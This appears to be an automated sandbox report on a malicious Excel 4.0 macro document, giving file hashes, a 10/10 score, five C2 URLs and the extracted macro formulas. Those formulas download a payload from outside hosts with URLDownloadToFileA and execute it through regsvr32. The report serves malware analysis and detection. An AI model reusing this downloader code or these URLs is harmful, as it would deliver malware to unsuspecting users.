34c899df0fcd7f455567b860b79c7e898506865dad92b23f5ae13a8df4ea2124

General

Target

34c899df0fcd7f455567b860b79c7e898506865dad92b23f5ae13a8df4ea2124
Size

235KB
MD5

a488e871f604f3ffecc829fe1baa7c15
SHA1

0be2f3b44d0b15a8a5911c8d7f2b082331e19e60
SHA256

34c899df0fcd7f455567b860b79c7e898506865dad92b23f5ae13a8df4ea2124
SHA512

d93c652ea19e894825d4c17de1bc92cb44c324d9b0dd49c992daa7d2b7535277042a3c18f426b2039973a2d6ac5b8c0e747935dafaed641099037a3ac0375f69
SSDEEP

6144:sqkhXZFJGKbHWf5sBx3FkQZGHlw9Pz8FJGKbl7cdzDVCtc1tNCvitpY:sqkhXZFJZiGb3FkQKCxwFJodfV51zCa4

Score

10^/10

macro xlm

Rule

Excel 4.0 XLM Macro

C2

https://carretilha.net/whats/RSL50BlRP0a6hj/

https://shrinandrajoverseas.com/old/wQXty0wnVDY/

https://zionimoveis.com.br/wp-content/Bn00gaw/

https://kontacsgo.pl/m/uwZYNUjGeWW/

http://vps36153.publiccloud.com.br/wp-admin/RfAZZ776uMNhSpOT/

Attributes

formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carretilha.net/whats/RSL50BlRP0a6hj/","..\xxw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://shrinandrajoverseas.com/old/wQXty0wnVDY/","..\xxw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://zionimoveis.com.br/wp-content/Bn00gaw/","..\xxw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://kontacsgo.pl/m/uwZYNUjGeWW/","..\xxw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vps36153.publiccloud.com.br/wp-admin/RfAZZ776uMNhSpOT/","..\xxw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx") =RETURN()

Suspicious Office macro 2 IoCs

Office document equipped with 4.0 macros.

resource	yara_rule
static1/unpack001/Payment Status.xlsm	office_xlm_macros
static1/unpack001/iMedPub LTD.xlsm	office_xlm_macros